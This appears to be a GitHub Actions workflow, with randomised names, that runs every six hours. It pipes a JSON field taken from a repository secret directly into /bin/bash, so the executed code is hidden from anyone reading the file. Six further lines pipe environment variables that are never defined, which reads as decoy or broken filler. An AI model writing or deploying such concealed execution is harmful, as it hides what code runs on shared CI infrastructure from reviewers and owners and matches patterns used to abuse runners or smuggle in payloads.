name: zhangshun19871010

on:
  workflow_dispatch:
  schedule:
    - cron: '12 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zhangshun19871010
        env:
          ajsa304: ${{ secrets.ajsa304 }}
        run: |
          echo $ajsa304 | jq -r .dxs1420 | /bin/bash
          echo $egzqx25445 | jq -r .np2466 | /bin/bash
          echo $v6 | jq -r .c240 | /bin/bash
          echo $gjw7 | jq -r .fdo1141 | /bin/bash
          echo $xi6 | jq -r .pfw08 | /bin/bash
          echo $axobn89451 | jq -r .do11 | /bin/bash
          echo $hxvg39655 | jq -r .onbxp352 | /bin/bash

